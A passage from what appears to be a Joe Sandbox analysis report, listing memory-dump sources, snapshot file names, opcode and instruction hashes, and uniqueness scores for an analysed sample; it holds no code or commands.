                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_efd000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fefad8859e050c5c9b763882cc6948bcdb8666b4b1660103270f96e2c63ed80b
                                                    • Instruction ID: d2bc07da2e26857193fe53254613925b538a41ed804dedbce3e8267432a7cd3b
                                                    • Opcode Fuzzy Hash: fefad8859e050c5c9b763882cc6948bcdb8666b4b1660103270f96e2c63ed80b
                                                    • Instruction Fuzzy Hash: 6B320266A4E7C14FD31347385C706927FB15F47219B2E42DBC8D4CA9E3C25A682ECB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.522159044.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_eed000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 299ebd35cedef45d871924ecc2a8b2f7c9c69968432e45ec62d1acb4a3db30cf
                                                    • Instruction ID: e437c62faba5e1ab3ff57879a45a5ce1d529938a8fdcc1ca7f57eedf75054284
                                                    • Opcode Fuzzy Hash: 299ebd35cedef45d871924ecc2a8b2f7c9c69968432e45ec62d1acb4a3db30cf
                                                    • Instruction Fuzzy Hash: CB213AB1508288DFDB04DF10DDC0F26BB65FBA4324F24C579E9095B286C336E856CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.522332823.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_efd000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eb66988699e30bcc970d01918ad86b24e1169ec54fb0cb0948daf3e13ec72bfe
                                                    • Instruction ID: 1ce36650be3a1b7684087b952682cdcbbf8ea854913b27aa754366f008c78848
                                                    • Opcode Fuzzy Hash: eb66988699e30bcc970d01918ad86b24e1169ec54fb0cb0948daf3e13ec72bfe
                                                    • Instruction Fuzzy Hash: 72213A71504208DFDB14CF10D8C4B36BB65FB84318F24C96DDA095B356C33AEC46CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.522159044.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_eed000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 17894ca1eab804f1555070659dd00dfff87542e61665d1c8f73af2d5ff09c7fa
                                                    • Instruction ID: 3523114d332e83efd845bc015b72476be3c45a0ac7234b3addbeb72e9ce58639
                                                    • Opcode Fuzzy Hash: 17894ca1eab804f1555070659dd00dfff87542e61665d1c8f73af2d5ff09c7fa
                                                    • Instruction Fuzzy Hash: AC11E676404284DFCF11CF10D9C4B16BF72FB94324F28C6A9D8095B656C33AE856CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%